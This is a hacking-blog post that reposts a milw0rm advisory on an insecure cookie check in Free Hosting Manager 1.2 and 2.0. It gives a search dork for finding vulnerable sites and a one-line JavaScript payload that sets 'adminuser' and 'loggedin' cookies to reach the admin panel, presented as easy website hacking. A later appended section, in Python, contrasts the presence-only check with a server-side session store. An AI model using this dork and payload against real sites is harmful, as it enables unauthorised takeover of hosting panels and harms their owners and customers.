Sign by xXx - xXx Rulez

One of the easiest methods of WEBSITE HACKING



Free Hosting Manager = 1.2 & 2.0
Insecure Cookie Handling Vulnerability

DorKs : "Powered By Free Hosting Manager"

DESCRIPTION :
The admin panel only checks whether the cookie exists.

Vulnerability :
After opening the site,
just run this JavaScript in the address bar:
javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";

The complete line above may not be
fully visible on this blog.
Just copy-paste it
into Notepad to see it completely.

After running the JavaScript,
go to "www.site.com/admin" & refresh.

BANG!!! You will be in the admin panel.

AUTHOR : Scary-Boys

source : http://www.milw0rm.com/exploits/6213
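
The flaw in the DESCRIPTION above (a check for cookie presence only), next to a server-side session check that does not trust client-set cookies. This is an added example, not code from the original post or from Free Hosting Manager. Only the `adminuser` and `loggedin` cookie names come from the advisory; the `SessionStore` class, the `sid` cookie name and the 30-minute lifetime are assumptions.

```python
import hashlib
import secrets

ADMIN_COOKIES = ("adminuser", "loggedin")  # cookie names from the advisory

def is_admin_presence_only(cookies):
    """Flawed pattern: any client that sends both cookies is treated as admin."""
    return all(name in cookies for name in ADMIN_COOKIES)

class SessionStore:
    """Hypothetical server-side session table (in memory for this demo)."""

    def __init__(self, ttl=1800):
        self.ttl = ttl   # assumed lifetime in seconds
        self._rows = {}  # sha256(session id) -> record; raw ids are never stored

    @staticmethod
    def _key(sid):
        return hashlib.sha256(sid.encode()).hexdigest()

    def issue(self, user, is_admin, now):
        """Call only after the password check succeeds; returns the cookie value."""
        sid = secrets.token_hex(32)  # 256 random bits from the OS CSPRNG
        self._rows[self._key(sid)] = {
            "user": user, "is_admin": is_admin, "expires": now + self.ttl}
        return sid

    def is_admin(self, cookies, now):
        """The cookie is only a lookup key; privilege comes from the server's record."""
        sid = cookies.get("sid", "")
        if not isinstance(sid, str) or len(sid) != 64:
            return False
        row = self._rows.get(self._key(sid))
        return bool(row and row["is_admin"] and row["expires"] > now)

def demo():
    forged = {"adminuser": "1", "loggedin": "1"}  # constructed: cookies set client-side
    store = SessionStore()
    sid = store.issue("admin", True, now=1000)    # constructed timestamps
    return {
        "presence_accepts_forged": is_admin_presence_only(forged),
        "session_accepts_forged": store.is_admin(forged, now=1001),
        "session_accepts_unknown_sid": store.is_admin({"sid": "0" * 64}, now=1001),
        "session_accepts_issued_sid": store.is_admin({"sid": sid}, now=1001),
        "session_accepts_expired_sid": store.is_admin({"sid": sid}, now=2801),
    }

if __name__ == "__main__":
    print(demo())
```

In a deployed application the session cookie would also be sent with the `HttpOnly`, `Secure` and `SameSite` attributes, and the id would be reissued at login.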

This entry was posted on 3:09 AM.